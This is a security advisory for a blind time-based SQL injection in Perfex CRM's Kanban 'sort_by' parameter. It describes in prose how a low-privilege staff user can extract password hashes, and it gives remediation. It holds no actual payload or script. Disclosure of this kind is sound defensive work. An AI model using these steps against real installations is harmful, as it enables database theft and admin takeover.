CodeCanyon Perfex CRM SQL Injection Vulnerability in Admin Kanban Endpoint

A blind time-based SQL injection vulnerability has been identified in CodeCanyon Perfex CRM versions through 3.4.1. The issue arises in the Admin Kanban Endpoint, specifically within the AbstractKanban::applySortQuery function of the application/services/AbstractKanban.php file. The vulnerability allows remote attackers to manipulate the 'sort_by' request parameter, injecting malicious SQL that is executed by the database. This exploitation can lead to unauthorized data access, including sensitive information such as password hashes that can be used to gain administrative privileges.

Impact

Exploitation of this vulnerability allows authenticated staff members to perform blind SQL injection attacks, reading arbitrary data from the application's database. This includes accessing bcrypt-hashed passwords for staff accounts, which can be cracked offline to gain admin rights. The SQL injection occurs through the 'sort_by' parameter in Kanban load-more endpoints, with the injected SQL executed in a time-based manner to extract data.

Reproduction

To reproduce this vulnerability, log into Perfex CRM 3.4.1 as a staff member with no administrative privileges. Navigate to the 'Leads' section, which is accessible to low-privilege staff. The 'leads_kanban_load_more' endpoint can be exploited by injecting a SQL payload into the 'sort_by' parameter. This injection can be automated with a provided Python script that logs in as a staff member, calibrates the SQL injection payload, and extracts password hashes from the database.

Remediation

To address this vulnerability, update Perfex CRM to a patched version that validates the 'sort_by' parameter against a whitelist of allowed columns. Additionally, ensure that any user input reaching the database query layer is properly escaped to prevent SQL injection.